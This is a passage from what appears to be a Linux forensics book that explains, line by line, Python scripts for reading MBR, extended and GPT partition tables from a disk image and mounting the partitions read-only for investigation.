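    print(the_end)
    print(len(start_field), list(start_field))
```

Note that the end index is exclusive, so a slice from offset + 8 to offset + 12 is exactly four bytes long.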

The slices in these last two lines of the constructor contain 32-bit little endian integers in packed string format. If you are unfamiliar with the term little endian, it refers to how multi-byte values are stored in a computer. Nearly all computers you are likely to work with while doing forensics store values in little endian format, which means bytes are stored from least to most significant. For example, the value 0xAABBCCDD would be stored as 0xDD 0xCC 0xBB 0xAA or '\xDD\xCC\xBB\xAA' in packed string format. The unpack function from the struct library is used to convert a packed string into a numerical value.

Recall that the struct library was one of the imported libraries at the top of our script. In order for Python to find the functions from these imported libraries you must preface the function names with the library followed by a period. That is why the unpack function is called struct.unpack in our script. The unpack function takes a format string and a packed string as input. Our format string '<I' specifies an unsigned integer in little endian format. The format string input to the unpack function can contain more than one specifier, which allows unpack to convert more than one value at a time. As a result, the unpack function returns an array. That is why you will find “[0]” on the end of these two lines as we only want the first item in the returned array (which should be the only item!). When you break it down, it is easy to see that self.start = struct.unpack('<I', sector[offset + 8: offset + 12])[0] gets a 4-byte packed string containing the starting sector in little endian format, converts it to a numeric value using unpack, and then stores the result in a class value named start.
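A few lines of Python make the byte order discussion concrete. This sketch is written for Python 3, where packed data is a bytes object rather than a string; the sample values 63 and 208782 are arbitrary.

```python
import struct

# 0xAABBCCDD as it would sit on disk in little endian order
packed = b"\xDD\xCC\xBB\xAA"

little = struct.unpack("<I", packed)[0]   # least significant byte first
big = struct.unpack(">I", packed)[0]      # same bytes read as big endian

# One format string can decode several values; unpack always returns a tuple
entry_tail = struct.pack("<II", 63, 208782)
start, sectors = struct.unpack("<II", entry_tail)

if __name__ == "__main__":
    print(hex(little), hex(big))
    print(start, sectors)
```

Reading both 32-bit fields in one call is an alternative to the two separate unpack calls in the script; which you prefer is a matter of taste.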

The printPart function in MbrRecord is a little easier to understand than the constructor. First this function checks to see if the partition entry is empty; if so, it just prints “<empty>”. If it is not empty, whether or not it is bootable, its type, starting sector, and total sectors are displayed.

The script creates a usage function similar to what we have done with our shell scripts in the past. Note that this function is not indented and, therefore, not part of the MbrRecord class. The function does make use of the sys library that was imported in order to retrieve the name of this script using sys.argv[0], which is equivalent to $0 in our shell scripts.

We then define a main function. As with our shell scripts, we first check that an appropriate number of command line arguments are passed in, and, if not, display a usage message and exit. Note that the test here is for less than two command line arguments. There will always be one command line argument, the name of the script being run. In other words, if len(sys.argv) < 2: will only be true if you passed in no arguments.

Once we have verified that you passed in at least one argument, we check to see if the file really exists, displaying an error and exiting if it doesn’t, in the following lines of code:

if not os.path.isfile(sys.argv[1]):
    print("File " + sys.argv[1] + " cannot be opened for reading")
    exit(1)

The next two lines might seem a bit strange if you are not a Python programmer (yet). This construct is the preferred way of opening and reading files in Python as it is succinct and ensures that your files will be closed cleanly. Even some readers who use Python might not be familiar with this method as it has been available for less than a decade, and I have seen some recently published Python books in forensics and information security still teaching people the old, non-preferred way of handling files. The two lines in question follow.

with open(sys.argv[1], 'rb') as f:
    sector = str(f.read(512))

To fully understand why this is a beautiful thing, you need to first understand how Python handles errors. Like many other languages, Python uses exceptions for error handling. At a high level exceptions work as follows. Any risky code that might generate an error (which is called throwing an exception) is enclosed in a try block. This try block is followed by one or more exception catching blocks that will process different errors (exception types). There is also an optional block, called a finally block, that is called every time the program exits the try block whether or not there was an error. The two lines above are roughly equivalent to the following (the with statement does not catch the exception itself; it only guarantees that the file is closed):

f = None
try:
    f = open(sys.argv[1], 'rb')
    sector = str(f.read(512))
except Exception as e:
    print('An exception occurred: ' + str(e))
finally:
    # f is still None if open() itself failed
    if f:
        f.close()

The file passed in to the script is opened as a read-only binary file because the 'rb' argument passed to open specifies the file mode. When the file is opened, a new file object named f is created. The read function of f is then called and the first 512 bytes (containing the MBR) are read. The MBR is converted to a string by enclosing f.read(512) inside str() and this string is stored in a variable named sector. Regardless of any errors, the file is closed cleanly before execution of the script proceeds.

Once the MBR has been read we do a sanity check. If the file is not corrupted or the wrong kind of file, the last two bytes should be 0x55 0xAA. This is the standard signature for an MBR or something called a Volume Boot Record (VBR). A VBR is a boot sector for a File Allocation Table (FAT) filesystem used by DOS and older versions of Windows. To distinguish between a VBR and MBR we check the first byte for each MBR partition entry and verify that each is either 0x80 or 0x00. If all four entries check out, we proceed under the assumption that it is an MBR. Otherwise we assume it is a VBR and mount the only partition straight away.
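The sanity check can also be written as a small stand-alone function. The sketch below is a hedged variant for Python 3, where the data read from a binary file is a bytes object and indexing it yields integers, so the comparisons use numbers rather than the packed strings in the script above. The name classify_boot_sector is my own.

```python
def classify_boot_sector(sector):
    """Return 'mbr', 'vbr', or 'unknown' using the heuristic from the text."""
    if len(sector) < 512 or sector[510:512] != b"\x55\xaa":
        return "unknown"
    # The first byte of each of the four entries must be 0x80 or 0x00 in an MBR
    flags = [sector[446 + 16 * i] for i in range(4)]
    if all(flag in (0x00, 0x80) for flag in flags):
        return "mbr"
    return "vbr"


if __name__ == "__main__":
    fake_mbr = bytearray(512)
    fake_mbr[446] = 0x80             # first entry bootable
    fake_mbr[450] = 0x83             # Linux partition type
    fake_mbr[510:512] = b"\x55\xaa"
    print(classify_boot_sector(bytes(fake_mbr)))
```

Keep in mind that this is a heuristic: a boot sector whose bytes at those four offsets all happen to be 0x00 or 0x80 would be misread as an MBR.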

The line

parts = [MbrRecord(sector, 0), MbrRecord(sector, 1), \
         MbrRecord(sector, 2), MbrRecord(sector, 3)]

creates a list containing the four partition entries. Notice that I said line, not lines. The “\” at the end of the first line is a line continuation character. This is used to make things more readable without violating Python’s indentation rules.

At this point I must confess to a white lie I told earlier in this chapter. Python does not have arrays. Rather, Python has two things that look like arrays: lists and tuples. To create a list in Python simply enclose the list items in square brackets and separate them with commas. The list we have described here is mutable (its values can be changed). Enclosing items in parentheses creates a tuple which is used in the same way, but is immutable. Some readers may be familiar with arrays in other languages. Unlike arrays, items in a list or tuple can be of different types in Python.
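The difference between lists and tuples is easiest to see by trying to change them. The values in this small sketch are arbitrary examples, not taken from the script.

```python
# A list is mutable: items can be replaced and appended
partition_types = [0x83, 0x82]
partition_types.append(0x05)
partition_types[0] = 0x07

# A tuple is immutable: assigning to an item raises TypeError
signature = (0x55, 0xAA)
try:
    signature[0] = 0x00
    tuple_changed = True
except TypeError:
    tuple_changed = False

# Items do not have to share a type
mixed = ["swap", 0x82, True]

if __name__ == "__main__":
    print(partition_types, signature, tuple_changed, mixed)
```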

Once we have the list of partitions, we iterate over the list in the following for loop:

for p in parts:
    p.printPart()
    if not p.empty:
        notsupParts = [0x05, 0x0f, 0x85, 0x91, 0x9b, 0xc5, 0xe4, 0xee]
        if p.type in notsupParts:
            print("Sorry GPT and extended partitions " + \
                "are not supported by this script!")
        else:
            mountpath = '/media/part%s' % str(p.partno)
            # if the appropriate directory doesn't exist create it
            if not os.path.isdir(mountpath):
                subprocess.call(['mkdir', mountpath])
            mountopts = 'loop,ro,noatime,offset=%s' % str(p.start * 512)
            subprocess.call(['mount', '-o', mountopts, sys.argv[1], mountpath])

Let’s break down this for loop. The line for p in parts: starts a for loop block. This causes the Python interpreter to iterate over the parts list setting the variable p to point to the current item in parts with each iteration. We start by printing out the partition entry using p.printPart(). If the entry is not empty we proceed with our attempts to mount it.

We create another list, notsupParts, and fill it with partition types that are not supported by this script. Next, we check to see if the current partition’s type is in the list with if p.type in notsupParts:. If it is in the list, we print a sorry message. Otherwise (else:) we continue with our mounting process.

The line mountpath = '/media/part%s' % str(p.partno) uses a popular Python construct to build a string. The general format of this construct is "some string containing placeholders" % <a single value or a tuple of values>. For example, 'Hello %s, My name is %s' % ('Bob', 'Phil') would evaluate to the string 'Hello Bob, My name is Phil'. The line in our code causes mountpath to be assigned the value of '/media/part0', '/media/part1', '/media/part2', or '/media/part3'.

The line if not os.path.isdir(mountpath): checks for the existence of this mountpath directory. If it doesn’t exist it is created on the next line, which uses subprocess.call() to call an external program or command. This function expects a list containing the program to be run and any arguments.

On the next line the string substitution construct is used once again to create a string with options for the mount command complete with the appropriate offset. Note that str(p.start * 512) is used to first compute this offset and then convert it from a numeric value to a string as required by the % operator. Finally, we use subprocess.call() to run the mount command.
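To make the offset arithmetic concrete, the sketch below builds the same argument list that is handed to subprocess.call() without actually running mount. The helper name build_mount_command and the image name subject.img are hypothetical and exist only for this illustration.

```python
SECTOR_SIZE = 512  # bytes per sector, as assumed throughout this chapter


def build_mount_command(image, start_sector, partno):
    """Return the argument list for a read-only loop mount of one partition."""
    mountpath = '/media/part%s' % str(partno)
    mountopts = 'loop,ro,noatime,offset=%s' % str(start_sector * SECTOR_SIZE)
    return ['mount', '-o', mountopts, image, mountpath]


# A partition starting at sector 2048 lies 2048 * 512 = 1048576 bytes in.
cmd = build_mount_command('subject.img', 2048, 0)
print(' '.join(cmd))
```

Keeping the command as a list, rather than one long string, is what lets subprocess.call() pass each argument to mount unchanged.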

Only one thing remains in the script that requires explanation, and that is the last two lines. The test if __name__ == "__main__": is a common trick used in Python scripting. If the script is executed directly the variable __name__ is set to "__main__". If, however, the script is merely imported, __name__ is set to the name of the module instead and main() is not called. This allows the creation of Python scripts that can both be run and imported into other scripts (thereby allowing code to be reused).

If you are new to Python you might want to take a break at this point after walking through our first script. You might want to reread this section if you are still a bit uncertain about how this script works. Rest assured that things will be a bit easier as we press on and develop new scripts.

The results of running our script against an image file from a Windows system are shown in Figure 5.12. Figure 5.13 depicts what happens when running the script against an image from an Ubuntu 14.04 system.

FIGURE 5.12

Running the Python mounting script against an image file from a Windows system.

FIGURE 5.13

Running the Python mounting script against an image file from an Ubuntu 14.04 system.

MBR-based extended partitions

The following script will attempt to mount anything in extended partitions that were skipped over in the previous script:

#!/usr/bin/python
#
# mount-image-extpart.py
#
# This is a simple Python script that will
# attempt to mount partitions inside an extended
# partition from an image file.
# Images are mounted read-only.
#
# Developed by Dr. Phil Polstra (@ppolstra)
# for PentesterAcademy.com

import sys
import os.path
import subprocess
import struct

"""
Class MbrRecord: decodes a partition record from a Master Boot Record
Usage: rec = MbrRecord(sector, partno) where
    sector is the 512 byte or greater sector containing the MBR
    partno is the partition number 0-3 of interest
    rec.printPart() prints partition information
"""
class MbrRecord():
    def __init__(self, sector, partno):
        self.partno = partno
        # first record at offset 446 & records are 16 bytes
        offset = 446 + partno * 16
        self.active = False
        # first byte == 0x80 means active (bootable)
        if sector[offset] == '\x80':
            self.active = True
        self.type = ord(sector[offset+4])
        self.empty = False
        # partition type == 0 means it is empty
        if self.type == 0:
            self.empty = True
        # sector values are 32-bit and stored in little endian format
        self.start = struct.unpack('<I', sector[offset + 8: \
            offset + 12])[0]
        self.sectors = struct.unpack('<I', sector[offset + 12: \
            offset + 16])[0]

    def printPart(self):
        if self.empty == True:
            print("<empty>")
        else:
            outstr = ""
            if self.active == True:
                outstr += "Bootable:"
            outstr += "Type " + str(self.type) + ":"
            outstr += "Start " + str(self.start) + ":"
            outstr += "Total sectors " + str(self.sectors)
            print(outstr)

def usage():
    print("usage " + sys.argv[0] + " <image file>\n" + \
        "Attempts to mount extended partitions from an image file")
    exit(1)

def main():
    if len(sys.argv) < 2:
        usage()

    # only extended partitions will be processed
    extParts = [0x05, 0x0f, 0x85, 0x91, 0x9b, 0xc5, 0xe4]
    # swap partitions will be ignored
    swapParts = [0x42, 0x82, 0xb8, 0xc3, 0xfc]

    # read first sector
    if not os.path.isfile(sys.argv[1]):
        print("File " + sys.argv[1] + " cannot be opened for reading")
        exit(1)

    with open(sys.argv[1], 'rb') as f:
        sector = str(f.read(512))

    if (sector[510] == "\x55" and sector[511] == "\xaa"):
        print("Looks like a MBR or VBR")
        # if it is an MBR bytes 446, 462, 478, and 494 must be 0x80 or 0x00
        if (sector[446] == '\x80' or sector[446] == '\x00') and \
            (sector[462] == '\x80' or sector[462] == '\x00') and \
            (sector[478] == '\x80' or sector[478] == '\x00') and \
            (sector[494] == '\x80' or sector[494] == '\x00'):
            print("Must be a MBR")
            parts = [MbrRecord(sector, 0), MbrRecord(sector, 1), \
                MbrRecord(sector, 2), MbrRecord(sector, 3)]
            for p in parts:
                p.printPart()
                if not p.empty:
                    # if it isn't an extended partition ignore it
                    if p.type in extParts:
                        print("Found an extended partition at sector %s" \
                            % str(p.start))
                        bottomOfRabbitHole = False
                        extendPartStart = p.start
                        extPartNo = 5
                        while not bottomOfRabbitHole:
                            # get the linked list MBR entry
                            with open(sys.argv[1], 'rb') as f:
                                f.seek(extendPartStart * 512)
                                llSector = str(f.read(512))
                            extParts = [MbrRecord(llSector, 0),
                                MbrRecord(llSector, 1)]
                            # try and mount the first partition
                            if extParts[0].type in swapParts:
                                print("Skipping swap partition")
                            else:
                                mountpath = '/media/part%s' % str(extPartNo)
                                if not os.path.isdir(mountpath):
                                    subprocess.call(['mkdir', mountpath])
                                mountopts = 'loop,ro,noatime,offset=%s' \
                                    % str((extParts[0].start + extendPartStart) * 512)
                                print("Attempting to mount extend part type %s at sector %s" \
                                    % (hex(extParts[0].type), \
                                    str(extendPartStart + extParts[0].start)))
                                subprocess.call(['mount', '-o', mountopts, \
                                    sys.argv[1], mountpath])
                            if extParts[1].type == 0:
                                bottomOfRabbitHole = True
                                print("Found the bottom of the rabbit hole")
                            else:
                                extendPartStart += extParts[1].start
                                extPartNo += 1

if __name__ == "__main__":
    main()

This script starts out very similar to the previous script until we get into the main function. The first difference is the definition of two lists: extParts and swapParts that list extended partition and swap partition types, respectively. We then read the MBR as before and verify that it looks like an MBR should. Things really start to diverge from the previous script at the following lines:

if p.type in extParts:
    print("Found an extended partition at sector %s" \
        % str(p.start))
    bottomOfRabbitHole = False
    extendPartStart = p.start
    extPartNo = 5

In these lines we check to see if we have found an extended partition. If so we print a message and set a few variables. The first variable named bottomOfRabbitHole is set to false. This variable is used to indicate when we have found the lowest level in a set of nested extended partitions. The start sector of the primary extended partition is stored in extendPartStart. This is necessary because addresses inside an extended partition are relative to the extended partition, but we need absolute addresses to mount the partition(s). Finally, we set a variable extPartNo equal to 5 which is traditionally used as the partition number for the first logical partition within an extended partition.

The line while not bottomOfRabbitHole: begins a while loop. A while loop is executed as long as the condition listed in the while loop is true. Within the while loop we use our with open construct as before to read the mini-MBR at the start of the extended partition with one small addition to the previous script. The line f.seek(extendPartStart * 512) is new. Because the mini-MBR is not located at the start of the file (LBA 0) we must seek ahead to the appropriate place. The offset we need is just the sector number multiplied by the size of a sector (512).
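The seek-then-read pattern is worth isolating because every later script reuses it. The sketch below is a small Python 3 illustration; the helper name read_sector and the throwaway three-sector file are assumptions made for the example.

```python
import os
import tempfile


def read_sector(path, lba, sector_size=512):
    """Read one sector from an image file given its LBA (sector number)."""
    with open(path, 'rb') as f:
        f.seek(lba * sector_size)   # byte offset = sector number * sector size
        return f.read(sector_size)


# Demonstrate on a small throwaway file of three sectors.
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b'A' * 512 + b'B' * 512 + b'C' * 512)
sector1 = read_sector(tmp.name, 1)
os.remove(tmp.name)
print(sector1[:4])
```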

Next we read the first two entries in the mini-MBR into a list, extParts. If the first entry (extParts[0]) is a swap partition, we skip it. Otherwise we attempt to mount it. The mounting code is the same as that found in the previous script.

We then check the second entry in the mini-MBR (extParts[1]). If its type is 0x00, there are no nested extended partitions and we are done. If this is not the case we add the starting sector of the nested extended partition to extendPartStart and increment extPartNo so things are set up properly for our next iteration of the while loop.
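The chain of mini-MBRs can be explored safely on a synthetic image held in memory. The following Python 3 sketch rests on one assumption that should be stated loudly: it treats the link in the second entry as relative to the start of the primary extended partition, which is how the extended boot record layout is usually documented. The script above instead adds each link to a running total; the two approaches agree when an extended partition holds at most two logical partitions. The names make_ebr and walk_extended and all sector numbers are invented for this example.

```python
import struct

SECTOR = 512


def make_ebr(first, second):
    """Build a synthetic mini-MBR; each argument is (type, start, sectors)."""
    ebr = bytearray(SECTOR)
    for i, (ptype, start, count) in enumerate((first, second)):
        off = 446 + 16 * i
        ebr[off + 4] = ptype
        ebr[off + 8:off + 16] = struct.pack('<II', start, count)
    ebr[510:512] = b'\x55\xaa'
    return bytes(ebr)


def walk_extended(image, ext_start):
    """Return (type, absolute start sector) for each logical partition."""
    found = []
    seen = set()                    # guards against a looping chain
    ebr_lba = ext_start
    while ebr_lba not in seen:
        seen.add(ebr_lba)
        ebr = image[ebr_lba * SECTOR:(ebr_lba + 1) * SECTOR]
        ptype = ebr[446 + 4]
        start = struct.unpack('<I', ebr[446 + 8:446 + 12])[0]
        if ptype != 0:
            # first entry: relative to the mini-MBR that holds it
            found.append((ptype, ebr_lba + start))
        next_type = ebr[462 + 4]
        next_start = struct.unpack('<I', ebr[462 + 8:462 + 12])[0]
        if next_type == 0:
            break                   # bottom of the rabbit hole
        # second entry: assumed relative to the extended partition start
        ebr_lba = ext_start + next_start
    return found


# Extended partition at sector 10 holding three logical partitions.
image = bytearray(30 * SECTOR)
image[10 * SECTOR:11 * SECTOR] = make_ebr((0x83, 2, 5), (0x05, 8, 7))
image[18 * SECTOR:19 * SECTOR] = make_ebr((0x82, 1, 4), (0x05, 16, 6))
image[26 * SECTOR:27 * SECTOR] = make_ebr((0x83, 2, 3), (0x00, 0, 0))
logicals = walk_extended(bytes(image), 10)
print(logicals)
```

Working on a byte string rather than a real image makes it easy to test unusual layouts before pointing a script at evidence.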

GPT partitions

Now that we have covered systems using the legacy MBR-based method of partition, let’s move on to GUID-based partitions. Hopefully within the next few years this will become the only system you have to handle during your investigations. As I said previously, this new system is much more straightforward and elegant. Our script for automatically mounting these partitions follows.

#!/usr/bin/python
#
# mount-image-gpt.py
#
# This is a simple Python script that will
# attempt to mount partitions from an image file.
# This script is for GUID partitions only.
# Images are mounted read-only.
#
# Developed by Dr. Phil Polstra (@ppolstra)
# for PentesterAcademy.com

import sys
import os.path
import subprocess
import struct

# GUIDs for supported partition types
supportedParts = ["EBD0A0A2-B9E5-4433-87C0-68B6B72699C7",
    "37AFFC90-EF7D-4E96-91C3-2D7AE055B174",
    "0FC63DAF-8483-4772-8E79-3D69D8477DE4",
    "8DA63339-0007-60C0-C436-083AC8230908",
    "933AC7E1-2EB4-4F13-B844-0E14E2AEF915",
    "44479540-F297-41B2-9AF7-D131D5F0458A",
    "4F68BCE3-E8CD-4DB1-96E7-FBCAF984B709",
    "B921B045-1DF0-41C3-AF44-4C6F280D3FAE",
    "3B8F8425-20E0-4F3B-907F-1A25A76F98E8",
    "E6D6D379-F507-44C2-A23C-238F2A3DF928",
    "516E7CB4-6ECF-11D6-8FF8-00022D09712B",
    "83BD6B9D-7F41-11DC-BE0B-001560B84F0F",
    "516E7CB5-6ECF-11D6-8FF8-00022D09712B",
    "85D5E45A-237C-11E1-B4B3-E89A8F7FC3A7",
    "516E7CB4-6ECF-11D6-8FF8-00022D09712B",
    "824CC7A0-36A8-11E3-890A-952519AD3F61",
    "55465300-0000-11AA-AA11-00306543ECAC",
    "516E7CB4-6ECF-11D6-8FF8-00022D09712B",
    "49F48D5A-B10E-11DC-B99B-0019D1879648",
    "49F48D82-B10E-11DC-B99B-0019D1879648",
    "2DB519C4-B10F-11DC-B99B-0019D1879648",
    "2DB519EC-B10F-11DC-B99B-0019D1879648",
    "49F48DAA-B10E-11DC-B99B-0019D1879648",
    "426F6F74-0000-11AA-AA11-00306543ECAC",
    "48465300-0000-11AA-AA11-00306543ECAC",
    "52414944-0000-11AA-AA11-00306543ECAC",
    "52414944-5F4F-11AA-AA11-00306543ECAC",
    "4C616265-6C00-11AA-AA11-00306543ECAC",
    "6A82CB45-1DD2-11B2-99A6-080020736631",
    "6A85CF4D-1DD2-11B2-99A6-080020736631",
    "6A898CC3-1DD2-11B2-99A6-080020736631",
    "6A8B642B-1DD2-11B2-99A6-080020736631",
    "6A8EF2E9-1DD2-11B2-99A6-080020736631",
    "6A90BA39-1DD2-11B2-99A6-080020736631",
    "6A9283A5-1DD2-11B2-99A6-080020736631",
    "75894C1E-3AEB-11D3-B7C1-7B03A0000000",
    "E2A1E728-32E3-11D6-A682-7B03A0000000",
    "BC13C2FF-59E6-4262-A352-B275FD6F7172",
    "42465331-3BA3-10F1-802A-4861696B7521",
    "AA31E02A-400F-11DB-9590-000C2911D1B8",
    "9198EFFC-31C0-11DB-8F78-000C2911D1B8",
    "9D275380-40AD-11DB-BF97-000C2911D1B8",
    "A19D880F-05FC-4D3B-A006-743F0F84911E"]

# simple helper to print GUIDs
# note that they are both little/big endian
def printGuid(packedString):
    if len(packedString) == 16:
        outstr = format(struct.unpack('<L', \
            packedString[0:4])[0], 'X').zfill(8) + "-" + \
            format(struct.unpack('<H', \
            packedString[4:6])[0], 'X').zfill(4) + "-" + \
            format(struct.unpack('<H', \
            packedString[6:8])[0], 'X').zfill(4) + "-" + \
            format(struct.unpack('>H', \
            packedString[8:10])[0], 'X').zfill(4) + "-" + \
            format(struct.unpack('>Q', \
            "\x00\x00" + packedString[10:16])[0], 'X').zfill(12)
    else:
        outstr = "<invalid>"
    return outstr

"""
Class GptRecord
Parses a GUID Partition Table entry
Usage: rec = GptRecord(recs, partno)
    where recs is a string containing all 128 GPT entries
    and partno is the partition number (0-127) of interest
    rec.printPart() prints partition information
"""
class GptRecord():
    def __init__(self, recs, partno):
        self.partno = partno
        offset = partno * 128
        self.empty = False
        # build partition type GUID string
        self.partType = printGuid(recs[offset:offset+16])
        if self.partType == \
            "00000000-0000-0000-0000-000000000000":
            self.empty = True
        self.partGUID = printGuid(recs[offset+16:offset+32])
        self.firstLBA = struct.unpack('<Q', \
            recs[offset+32:offset+40])[0]
        self.lastLBA = struct.unpack('<Q', \
            recs[offset+40:offset+48])[0]
        self.attr = struct.unpack('<Q', \
            recs[offset+48:offset+56])[0]
        nameIndex = recs[offset+56:offset+128].find('\x00\x00')
        if nameIndex != -1:
            self.partName = \
                recs[offset+56:offset+56+nameIndex].encode('utf-8')
        else:
            self.partName = \
                recs[offset+56:offset+128].encode('utf-8')

    def printPart(self):
        if not self.empty:
            outstr = str(self.partno) + ":" + self.partType + \
                ":" + self.partGUID + ":" + str(self.firstLBA) + \
                ":" + str(self.lastLBA) + ":" + \
                str(self.attr) + ":" + self.partName
            print(outstr)

"""
Class MbrRecord: decodes a partition record from a Master Boot Record
Usage: rec = MbrRecord(sector, partno) where
    sector is the 512 byte or greater sector containing the MBR
    partno is the partition number 0-3 of interest
    rec.printPart() prints partition information
"""
class MbrRecord():
    def __init__(self, sector, partno):
        self.partno = partno
        # first record at offset 446 & records are 16 bytes
        offset = 446 + partno * 16
        self.active = False
        # first byte == 0x80 means active (bootable)
        if sector[offset] == '\x80':
            self.active = True
        self.type = ord(sector[offset+4])
        self.empty = False
        # partition type == 0 means it is empty
        if self.type == 0:
            self.empty = True
        # sector values are 32-bit and stored in little endian format
        self.start = struct.unpack('<I', sector[offset + 8: \
            offset + 12])[0]
        self.sectors = struct.unpack('<I', sector[offset + 12: \
            offset + 16])[0]

    def printPart(self):
        if self.empty == True:
            print("<empty>")
        else:
            outstr = ""
            if self.active == True:
                outstr += "Bootable:"
            outstr += "Type " + str(self.type) + ":"
            outstr += "Start " + str(self.start) + ":"
            outstr += "Total sectors " + str(self.sectors)
            print(outstr)

def usage():
    print("usage " + sys.argv[0] + \
        " <image file>\nAttempts to mount partitions from an image file")
    exit(1)

def main():
    if len(sys.argv) < 2:
        usage()

    # read first sector
    if not os.path.isfile(sys.argv[1]):
        print("File " + sys.argv[1] + " cannot be opened for reading")
        exit(1)

    with open(sys.argv[1], 'rb') as f:
        sector = str(f.read(512))

    if (sector[510] == "\x55" and sector[511] == "\xaa"):
        # if it is an MBR bytes 446, 462, 478, and 494 must be 0x80 or 0x00
        if (sector[446] == '\x80' or sector[446] == '\x00') and \
            (sector[462] == '\x80' or sector[462] == '\x00') and \
            (sector[478] == '\x80' or sector[478] == '\x00') and \
            (sector[494] == '\x80' or sector[494] == '\x00'):
            part = MbrRecord(sector, 0)
            if part.type != 0xee:
                print("Failed protective MBR sanity check")
                exit(1)

    # check the header as another sanity check
    with open(sys.argv[1], 'rb') as f:
        f.seek(512)
        sector = str(f.read(512))

    if sector[0:8] != "EFI PART":
        print("You appear to be missing a GPT header")
        exit(1)

    print("Valid protective MBR and GPT partition table header found")

    with open(sys.argv[1], 'rb') as f:
        f.seek(1024)
        partRecs = str(f.read(512 * 32))

    parts = []
    for i in range(0, 128):
        p = GptRecord(partRecs, i)
        if not p.empty:
            p.printPart()
            parts.append(p)

    for p in parts:
        if p.partType in supportedParts:
            print("Partition %s seems to be supported attempting to mount" \
                % str(p.partno))
            mountpath = '/media/part%s' % str(p.partno)
            if not os.path.isdir(mountpath):
                subprocess.call(['mkdir', mountpath])
            mountopts = 'loop,ro,noatime,offset=%s' % \
                str(p.firstLBA * 512)
            subprocess.call(['mount', '-o', mountopts, \
                sys.argv[1], mountpath])

if __name__ == "__main__":
    main()

Let’s walk through this code. It begins with the normal she-bang. Then we import the same four libraries as in the previous scripts. Next we define a very long list of supported partition types. As you can see from this list, Linux supports most any partition type.

We define a simple helper function to print the GUIDs from the packed strings used to store the GPT entries on these lines:

def printGuid(packedString):
    if len(packedString) == 16:
        outstr = format(struct.unpack('<L', \
            packedString[0:4])[0], 'X').zfill(8) + "-" + \
            format(struct.unpack('<H', \
            packedString[4:6])[0], 'X').zfill(4) + "-" + \
            format(struct.unpack('<H', \
            packedString[6:8])[0], 'X').zfill(4) + "-" + \
            format(struct.unpack('>H', \
            packedString[8:10])[0], 'X').zfill(4) + "-" + \
            format(struct.unpack('>Q', \
            "\x00\x00" + packedString[10:16])[0], 'X').zfill(12)
    else:
        outstr = "<invalid>"
    return outstr

This helper function uses the same struct.unpack method found in the previous scripts. One difference is that the first three parts of the GUID are stored in little endian format and the last two are big endian. That is why the first three calls to struct.unpack have '<' in their format strings and the last two have '>'. Also, the last call to unpack might look a bit strange. All that I’ve done here is add two bytes of leading zeros to the value because there is no unpack format specifier for a 6-byte value, but there is one for an 8-byte value.

We have introduced a new function, format, in this helper function. As the name implies, format is used to convert values to strings in a specified way. Our chosen format, 'X', specifies hexadecimal with uppercase letters. Once we have a string containing our value we run zfill() on the string to add leading zeros in order for our GUIDs to print correctly. As a simple example, the expression format(struct.unpack('<L', '\x04\x00\x00\x00')[0], 'X').zfill(8) evaluates to the string "00000004".
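The mixed byte order is easy to check against Python’s standard uuid module, whose bytes_le attribute uses the same layout (first three fields little endian, the rest big endian). The sketch below is a Python 3 restatement of the helper, not the script’s own code; the name format_guid is an assumption for this example.

```python
import struct
import uuid


def format_guid(packed):
    """Render a 16-byte on-disk GUID in its usual text form."""
    if len(packed) != 16:
        return "<invalid>"
    d1, d2, d3 = struct.unpack('<LHH', packed[0:8])            # little endian
    d4 = struct.unpack('>H', packed[8:10])[0]                  # big endian
    d5 = struct.unpack('>Q', b'\x00\x00' + packed[10:16])[0]   # pad 6 -> 8 bytes
    return '%08X-%04X-%04X-%04X-%012X' % (d1, d2, d3, d4, d5)


# One of the GUIDs from the supported list, packed as it appears on disk.
text = '0FC63DAF-8483-4772-8E79-3D69D8477DE4'
on_disk = uuid.UUID(text).bytes_le
print(format_guid(on_disk))
```

The zero-padded format codes (%08X and so on) do the work of format() followed by zfill() in a single step.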

Next we define a GptRecord class that acts just like the MbrRecord class from the previous scripts. It expects a string containing the partition table entries (all 128 of them) and an index into the table as inputs. Only the following lines require any explanation in this class:

nameIndex = recs[offset+56:offset+128].find('\x00\x00')
if nameIndex != -1:
    self.partName = \
        recs[offset+56:offset+56+nameIndex].encode('utf-8')
else:
    self.partName = \
        recs[offset+56:offset+128].encode('utf-8')

Why are these lines here? I have found that sometimes Unicode strings such as those used to store the partition name in the GPT are null-terminated (with 0x00 0x00) and there may be random junk after the terminating null character. The first line in this code fragment uses find to see if there is a null character in the name. If the string is found, then nameIndex is set to its position. If the string is not found, the find function returns -1. Looking at the if block you will see that if a null was found, we only use characters before it to store the partition name. Otherwise we store all of the name.
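An alternative way to handle the same problem, shown here only as a Python 3 sketch, is to decode the 72-byte name field as UTF-16 little endian text first and then cut it at the first null character. The function name decode_part_name and the sample field contents are made up for this illustration.

```python
def decode_part_name(raw):
    """Decode a 72-byte GPT name field, dropping the terminator and any junk."""
    text = raw.decode('utf-16-le', errors='replace')
    return text.split('\x00', 1)[0]


# 'root' followed by a terminating null and leftover junk, padded to 72 bytes.
field = 'root'.encode('utf-16-le') + b'\x00\x00' + b'junk' + b'\x00' * 58
assert len(field) == 72
print(decode_part_name(field))
```

Splitting after decoding means the search works on whole characters rather than on individual bytes.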

The MbrRecord class still hasn’t gone away. This class is used to read the protective MBR as a sanity check. You will see that the main function starts out the same as before by reading the first sector and using MbrRecord to parse it. The second sanity check causes the script to exit if the first partition is not type 0xEE, which indicates a GPT drive.

The third sanity check reads the GPT header in the second sector and checks for the string "EFI PART" which should be stored in the first eight bytes of this sector. If this final check passes, the image is reopened and the next 32 sectors containing the 128 GPT entries are read.

We then have a new kind of for loop in this code:

for i in range(0, 128):
    p = GptRecord(partRecs, i)
    if not p.empty:
        p.printPart()
        parts.append(p)

Now instead of iterating over a list or tuple we are using an explicit range of numbers. It turns out that we are still iterating over a list. In the Python 2 used by these scripts, the range(n, m) function creates a list of integers in the range [n, m); in Python 3 it returns a range object that a for loop walks in the same way. This is what is commonly called a half open range. The n is included in the range (hence '[' on that end) and the m is not (as denoted by ')' on that end). For example, range(0, 5) evaluates to the list [0, 1, 2, 3, 4] in Python 2. Non-empty partitions are printed and added to the parts list. You may be wondering why I don’t stop once an empty record has been encountered. It is valid, though somewhat unusual, to have empty entries in the middle of the GPT.
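Both points, the half open range and the decision not to stop at the first empty entry, can be seen in a few lines. This sketch runs under Python 3 (hence the list() call); the records list is a made-up stand-in for parsed GPT entries.

```python
# range(n, m) covers n up to, but not including, m.
assert list(range(0, 5)) == [0, 1, 2, 3, 4]

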